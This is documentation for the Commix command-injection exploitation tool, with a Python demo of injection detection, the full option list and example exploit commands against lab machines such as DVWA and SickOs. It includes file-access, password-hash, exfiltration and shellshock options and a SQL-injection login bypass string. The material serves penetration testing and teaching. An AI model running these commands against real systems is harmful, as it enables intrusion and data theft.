
Commix – Automated Command Injection and Exploitation Tool

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool for testing web applications for command injection vulnerabilities: bugs where user-supplied input (a request parameter, cookie or HTTP header) is passed to an operating system shell without proper validation or quoting.

With this tool it is easy to find and exploit a command injection vulnerability in a given parameter or HTTP header: Commix tries a series of injection techniques (result-based, time-based, file-based) with a range of shell separators, and once a working combination is found it can enumerate the host, read and write files, or drop into an interactive os-shell.
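To make the detection mechanics concrete, the following added example (written for this page, not code from the Commix project) emulates the two detection techniques the option list below refers to, against three constructed stand-ins for a vulnerable page. The function names, the use of "echo" instead of "ping" (so it runs offline) and the separator list are assumptions made here; only the ideas (an arithmetic probe for the result-based technique, a sleep probe for the time-based technique, and a prefix/suffix around the payload) come from the page.

```python
import re
import subprocess
import time

# Constructed stand-ins for the kind of page Commix targets (e.g. the DVWA
# "exec" page in the examples below): a host name taken from the request is
# concatenated into a shell command. "echo" replaces "ping" so the sample runs
# offline; the injection mechanics are identical.

def vulnerable_lookup(host: str) -> str:
    """Classic (result-based) case: the command's output is echoed back."""
    cmd = "echo resolving " + host        # string concatenation + shell=True is the bug
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def blind_lookup(host: str) -> str:
    """Blind case: same bug, but the page never shows the command's output."""
    subprocess.run("echo resolving " + host, shell=True, capture_output=True, text=True)
    return "lookup submitted"


HOST_RE = re.compile(r"[A-Za-z0-9.\-]{1,253}")


def hardened_lookup(host: str) -> str:
    """Fixed form: allow-list the value and pass it as its own argv element (no shell)."""
    if not HOST_RE.fullmatch(host):
        return "invalid host"
    return subprocess.run(["echo", "resolving", host], capture_output=True, text=True).stdout


# Shell separators tried in order, the way an injection tool cycles through them.
SEPARATORS = [";", "|", "||", "&&", "\n"]


def result_based_probe(target, prefix="", suffix="", a=317, b=469):
    """Emulates the default detection phase: inject 'echo $((a+b))' behind each
    separator and look for the sum in the response (this is the "mathematic
    calculation" that --skip-calc turns off). Returns the first working
    separator, or None when the parameter does not appear injectable."""
    expected = str(a + b)
    for sep in SEPARATORS:
        payload = f"127.0.0.1{prefix}{sep}echo $(({a}+{b})){suffix}"
        if expected in target(payload):
            return sep
    return None


def time_based_probe(target, seconds=1, prefix="", suffix=""):
    """Blind detection (what --time-sec tunes): inject 'sleep N' and see whether
    the response is delayed by at least N seconds. Returns the first separator
    that produces the delay, or None."""
    for sep in SEPARATORS:
        payload = f"127.0.0.1{prefix}{sep}sleep {seconds}{suffix}"
        start = time.monotonic()
        target(payload)
        if time.monotonic() - start >= seconds:
            return sep
    return None


if __name__ == "__main__":
    print("classic target  :", result_based_probe(vulnerable_lookup))   # ';'
    print("blind target    :", result_based_probe(blind_lookup),        # None
          "/ time-based:", time_based_probe(blind_lookup))              # ';'
    print("hardened target :", result_based_probe(hardened_lookup),     # None
          "/ time-based:", time_based_probe(hardened_lookup))           # None
```

The blind target shows why a result-based probe alone is not enough: the injected command runs, but nothing in the response proves it, and only the delay does. The hardened variant rejects the metacharacters at the allow-list and, even if it did not, passes the value as a single argv element, so no separator is ever interpreted by a shell. The prefix and suffix parameters mirror the --prefix/--suffix options: when the vulnerable command wraps the value in quotes, the payload must close those quotes first, otherwise every separator fails the way it does here.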

Requirements

  • Python 2.6.x or 2.7.x
  • Linux/ Mac OS X/ Windows (experimental)


Installation

Download commix by cloning the Git repository:

git clone https://github.com/commixproject/commix.git commix

Commix also comes packaged in the official repositories of the following Linux distributions, so you can use the package manager to install it:

  • ArchStrike
  • BlackArch Linux
  • BackBox
  • Kali Linux
  • Parrot Security OS
  • Weakerthan Linux

Commix also comes as a plugin, on the following penetration testing frameworks:
  • TrustedSec’s Penetration Testers Framework (PTF)
  • OWASP Offensive Web Testing Framework (OWTF)
  • CTF-Tools
  • PentestBox
  • PenBox
  • Katoolin
  • Aptive’s Penetration Testing tools
  • Homebrew Tap – Pen Test Tools

Usage:

  python commix.py [option(s)]


  Options:
  -h, --help            Show help and exit.


  General:
    These options relate to general matters.


    -v VERBOSE          Verbosity level (0-4, Default: 0).

    --install           Install 'commix' to your system.

    --version           Show version number and exit.

    --update            Check for updates (apply if any) and exit.

    --output-dir=OUT..  Set custom output directory path.

    -s SESSION_FILE     Load session from a stored (.sqlite) file.

    --flush-session     Flush session files for current target.

    --ignore-session    Ignore results stored in session file.

    -t TRAFFIC_FILE     Log all HTTP traffic into a textual file.

    --batch             Never ask for user input, use the default behaviour.

    --charset=CHARSET   Force character encoding used for data retrieval.

    --check-internet    Check internet connection before assessing the target.


  Target:
    One of these options has to be provided to define the target URL(s).


    -u URL, --url=URL   Target URL.

    --url-reload        Reload target URL after command execution.

    -l LOGFILE          Parse target from HTTP proxy log file.

    -m BULKFILE         Scan multiple targets given in a textual file.

    -r REQUESTFILE      Load HTTP request from a file.

    --crawl=CRAWLDEPTH  Crawl the website starting from the target URL (1-2,

                        Default: 0).

    -x SITEMAP_URL      Parse target(s) from remote sitemap(.xml) file.


  Request:
    These options can be used to specify how to connect to the target URL.


    -d DATA, --data=..  Data string to be sent through POST.

    --host=HOST         HTTP Host header.

    --referer=REFERER   HTTP Referer header.

    --user-agent=AGENT  HTTP User-Agent header.

    --random-agent      Use a randomly selected HTTP User-Agent header.

    --param-del=PDEL    Set character for splitting parameter values.

    --cookie=COOKIE     HTTP Cookie header.

    --cookie-del=CDEL   Set character for splitting cookie values.

    -H HEADER, --hea..  Extra header (e.g. 'X-Forwarded-For: 127.0.0.1').

    --headers=HEADERS   Extra headers (e.g. 'Accept-Language: fr\nETag: 123').

    --proxy=PROXY       Use an HTTP proxy (e.g. '127.0.0.1:8080').

    --tor               Use the Tor network.

    --tor-port=TOR_P..  Set Tor proxy port (Default: 8118).

    --tor-check         Check to see if Tor is used properly.

    --auth-url=AUTH_..  Login panel URL.

    --auth-data=AUTH..  Login parameters and data.

    --auth-type=AUTH..  HTTP authentication type (e.g. 'Basic' or 'Digest').

    --auth-cred=AUTH..  HTTP authentication credentials (e.g. 'admin:admin').

    --ignore-401        Ignore HTTP error 401 (Unauthorized).

    --force-ssl         Force usage of SSL/HTTPS.

    --ignore-redirects  Ignore redirection attempts.

    --retries=RETRIES   Retries when the connection timeouts (Default: 3).


  Enumeration:
    These options can be used to enumerate the target host.


    --all               Retrieve everything.

    --current-user      Retrieve current user name.

    --hostname          Retrieve current hostname.

    --is-root           Check if the current user has root privileges.

    --is-admin          Check if the current user has admin privileges.

    --sys-info          Retrieve system information.

    --users             Retrieve system users.

    --passwords         Retrieve system users password hashes.

    --privileges        Retrieve system users privileges.

    --ps-version        Retrieve PowerShell's version number.


  File access:
    These options can be used to access files on the target host.


    --file-read=FILE..  Read a file from the target host.

    --file-write=FIL..  Write to a file on the target host.

    --file-upload=FI..  Upload a file on the target host.

    --file-dest=FILE..  Host's absolute filepath to write and/or upload to.


  Modules:
    These options can be used to increase the detection and/or injection
    capabilities.


    --icmp-exfil=IP_..  The 'ICMP exfiltration' injection module.

                        (e.g. 'ip_src=192.168.178.1,ip_dst=192.168.178.3').

    --dns-server=DNS..  The 'DNS exfiltration' injection module.

                        (Domain name used for DNS exfiltration attack).

    --shellshock        The 'shellshock' injection module.


  Injection:
    These options can be used to specify which parameters to inject and to

    provide custom injection payloads.


    -p TEST_PARAMETER   Testable parameter(s).

    --skip=SKIP_PARA..  Skip testing for given parameter(s).

    --suffix=SUFFIX     Injection payload suffix string.

    --prefix=PREFIX     Injection payload prefix string.

    --technique=TECH    Specify injection technique(s) to use.

    --skip-technique..  Specify injection technique(s) to skip.

    --maxlen=MAXLEN     Set the max length of output for time-related

                        injection techniques (Default: 10000 chars).

    --delay=DELAY       Seconds to delay between each HTTP request.

    --time-sec=TIMESEC  Seconds to delay the OS response (Default 1).

    --tmp-path=TMP_P..  Set the absolute path of web server's temp directory.

    --web-root=WEB_R..  Set the web server document root directory (e.g.

                        '/var/www').

    --alter-shell=AL..  Use an alternative os-shell (e.g. 'Python').

    --os-cmd=OS_CMD     Execute a single operating system command.

    --os=OS             Force back-end operating system (e.g. 'Windows' or

                        'Unix').

    --tamper=TAMPER     Use given script(s) for tampering injection data.

    --msf-path=MSF_P..  Set a local path where metasploit is installed.

    --backticks         Use backticks instead of "$()", for commands

                        substitution.


  Detection:
    These options can be used to customize the detection phase.


    --level=LEVEL       Level of tests to perform (1-3, Default: 1).

    --skip-calc         Skip the mathematic calculation during the detection

                        phase.

    --skip-empty        Skip testing the parameter(s) with empty value(s).

    --failed-tries=F..  Set a number of failed injection tries, in file-based

                        technique.


  Miscellaneous:
    --dependencies      Check for third-party (non-core) dependencies.

    --purge-output      Safely remove all content from output directory.

    --skip-waf          Skip heuristic detection of WAF/IPS/IDS protection.

    --mobile            Imitate smartphone through HTTP User-Agent header.

    --offline           Work in offline mode.

    --wizard            Simple wizard interface for beginner users.

    --disable-coloring  Disable console output coloring.

Examples:

  • Exploiting DVWA 1.0.8 (command execution page) using POST data and the session cookie:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"
  • Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"
  • Exploiting Mutillidae (DNS lookup page) using extra headers and an HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"
  • Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"
  • Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"
  • Exploiting a target behind a login form, using the --auth-url / --auth-data options to authenticate first:
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
  • Exploiting phptax using a custom User-Agent header and the file-based technique only:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"
  • Exploiting a CGI script using the shellshock module:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock
  • Exploiting the commix-testbed cookie scenario (blind) by injecting into the Cookie header:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"
  • Exploiting the commix-testbed User-Agent scenario (blind); level 3 is required to test HTTP headers:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3
  • Exploiting the commix-testbed Referer scenario (classic), again at level 3:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3
  • Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
  • Exploiting the commix-testbed JSON scenario by injecting into a JSON POST body:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'
  • Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"

Note that some of these examples predate the option list above: "--root-dir" is listed there as "--web-root", and "--base64" does not appear in it at all. Check "python commix.py --help" for the exact option names of the version you have installed before copying an example.